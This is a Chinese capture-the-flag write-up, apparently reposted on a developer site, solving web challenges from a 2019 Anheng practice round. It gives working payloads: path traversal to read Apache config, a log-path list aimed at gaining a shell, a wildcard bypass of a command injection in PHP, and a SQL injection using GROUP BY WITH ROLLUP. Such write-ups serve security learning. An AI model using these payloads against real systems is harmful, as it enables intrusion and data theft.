2019安恒周周练西湖论剑特别版

栏目: 服务器 · Apache · 发布时间: 5年前

内容简介:安恒开了周周练西湖论剑特别版,那就做一下吧某公司的网站遭受到黑客攻击,存放在Apache配置文件中的重要信息被黑客盗取了。公司员工为了验证成因,使用明鉴Web应用弱点扫描器扫描网站并导出漏洞报告,你能通过分析漏洞报告得出黑客可能是采用哪种漏洞盗取重要信息的么?被盗取的重要信息是什么?报告地址:

安恒开了周周练西湖论剑特别版,那就做一下吧

Web

Web 1 WebScan

Description

某公司的网站遭受到黑客攻击,存放在Apache配置文件中的重要信息被黑客盗取了。公司员工为了验证成因,使用明鉴Web应用弱点扫描器扫描网站并导出漏洞报告,你能通过分析漏洞报告得出黑客可能是采用哪种漏洞盗取重要信息的么?被盗取的重要信息是什么?

报告地址: https://xpro-resource.91ctf.com/5c149c800c81e.pdf

题目地址: http://101.71.29.5:10009

Hacking

题目给了几个洞,一个盲注,一个目录穿越文件包含

尝试直接用 sqlmap 的 sql_shell 进行操作,发现 secure_file_priv 为空,尝试用 load_file() 读源码,发现读不了,写到 /tmp/ 目录下用文件包含也不行,远程包含不行,本地包含屏蔽了关键字 php ,含有 php 的字符串都会被 Forbidden 。

尝试读配置文件 view-source:http://101.71.29.5:10009/index.php?act=about&file=/etc/httpd/conf/httpd.conf ,然后查找 log 的位置,想用文件包含 log 拿 shell 

/var/log/httpd/error_log
/var/log/apache2/error.log
/var/log/httpd-error.log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access.log

然而后来想想,题目应该是用的 file_get_content() 函数,而不是 include 的操作,即使有 php 代码,也应该无法解析。

然后瞎看配置文件的时候,发现 flag …

2019安恒周周练西湖论剑特别版

Web 2 刀塔

Description

无论你喜欢打Dota还是LOL,都进网站里学习一下吧!

题目地址: http://101.71.29.5:10010

Hacking

非预期

扫目录得到 www.zip ,打开在 flag.php 找到 flag

正常解

在 index.php 中可以看到

case 'news':
  if(isset($_GET['nid'])){

    if(preg_match("/[a-zA-Z]/",$_GET['nid'])){
      exit("Illegal operation!");
    }elseif(strlen($_GET[nid])>5){
      exit("Illegal operation!");
    }else{
      echo "<p class=lead>";
      system("head ./news/" . $_GET['nid']);
      echo "</p>";
    }

  }else{
    echo "<h3><a href=index.php?act=news&nid=1>鱼人守卫</a></h3>";
    echo "<h3><a href=index.php?act=news&nid=2>黑暗游侠</a></h3>";
    echo "<h3><a href=index.php?act=news&nid=3>血魔</a></h3>";

  }
  break;

可以看到这里用了 system ,正则只允许用字母,这里我们可以直接用通配符绕过就行了。直接 head 上级目录 act=news&nid=../*

2019安恒周周练西湖论剑特别版

Web 3 美男子

Description

我还是想安静的做一个美男子!

题目地址: http://101.71.29.5:10011

Hacking

源代码得到 index.phps 

<?php
include 'global.php';

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if(is_array($StrValue))
    {
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrtValue)==1){   
        print "holy shit!";
        exit();
    }      
} 

$filter = "union|select|from|where|join|sleep|benchmark|,|\(|\)";

foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}


if(!isset($_POST['key1']) || !isset($_POST['key2'])) {
    print <<<DBAPP

<img src='image/img.jpg' />
<!--index.phps-->
DBAPP;
    die;
}



$query = mysql_query("SELECT * FROM tb_ctf WHERE key1 = '{$_POST['key1']}'"); 
if(mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['key2'] == $_POST['key2']) {
        print $flag;
    }else{
        print "Error!";
        }
}else{
    print "Error!";
}

看了一下题目,注入点在 key1 处,可以用单引号闭合,但是需要查询结果得到的 key2 与传入的 key2 相等才能拿到 flag。我猜测是不是可以有类似 limit 或者 union 的操作, 控制查询的 key2 我们就可以传入控制点了

然后我就发现竟然是个原题… PHDays 2013 CTF “Blade” Writeup ,利用了 GROUP BY WITH ROLLUP ,相关文档: GROUP BY Modifiers

大概效果就是以下这个样子:

MariaDB [test]> select * from user  where id =1 GROUP BY id WITH ROLLUP LIMIT 1 OFFSET 1;
+------+----------+--------+
| id   | username | passwd |
+------+----------+--------+
| NULL | admin    | admin  |
+------+----------+--------+
1 row in set (0.001 sec)

MariaDB [test]> select * from user  where id =1 GROUP BY username WITH ROLLUP LIMIT 1 OFFSET 1;
+----+----------+--------+
| id | username | passwd |
+----+----------+--------+
|  1 | NULL     | admin  |
+----+----------+--------+
1 row in set (0.000 sec)

所以这里我们只需要让 key2 为空就行了。

key1=' or 1=1 GROUP BY key2 WITH ROLLUP LIMIT 1 OFFSET 1;#&key2=

2019安恒周周练西湖论剑特别版

Web 4 Easy Login

Description

Easy Login...So Easy...

题目地址: http://101.71.29.5:10017

然而题目没开…

Web 5 Be Allowed?

Description

小黑终于闯进了内网,找到了目标Web主机,但是却被做了限制!

题目地址: http://101.71.29.5:10016

然而题目没开…

Web 6 我的博客

Description

年轻不懂事,没事写博客。写出这么个东西,这可是一整个博客啊。(答案为flag{}形式,提交{}中内容即可)

题目地址: http://101.71.29.5:10015

然而题目没开…

Conclusion

明天就是正式比赛了,后面这几个没开的题目大概也不会开了。前几个还是学到了一点东西,主要是 web 3 学习到了 WITH ROLLUP 的用法,还是有点收获的,其他就比较水了。


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
计算机网络(第4版)

计算机网络(第4版)

[美] James F. Kurose、[美] Keith W. Ross / 陈鸣 / 机械工业出版社 / 2009-11 / 66.00元

本书采用了独创的自顶向下方法,即从应用层开始沿协议栈向下讲解计算机网络的基本原理,强调应用层范例和应用编程接口,内容深入浅出,注重教学方法,理论与实践相结合。第3版的内容相应更新并反映了网络领域的最新进展,如增加了无线和移动网络一章,扩充了对等网络、BGP、MPLS、网络安全、广播选路和因特网编址及转发方面的材料;还增加了一套实用的实验,并修订了习题。本书适合作为计算机、电子、通信工程相关专业的本......一起来看看 《计算机网络(第4版)》 这本书的介绍吧!

码农工具
在线进制转换器
在线进制转换器

各进制数互转换器

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2024 码农网 粤ICP备17054400号-3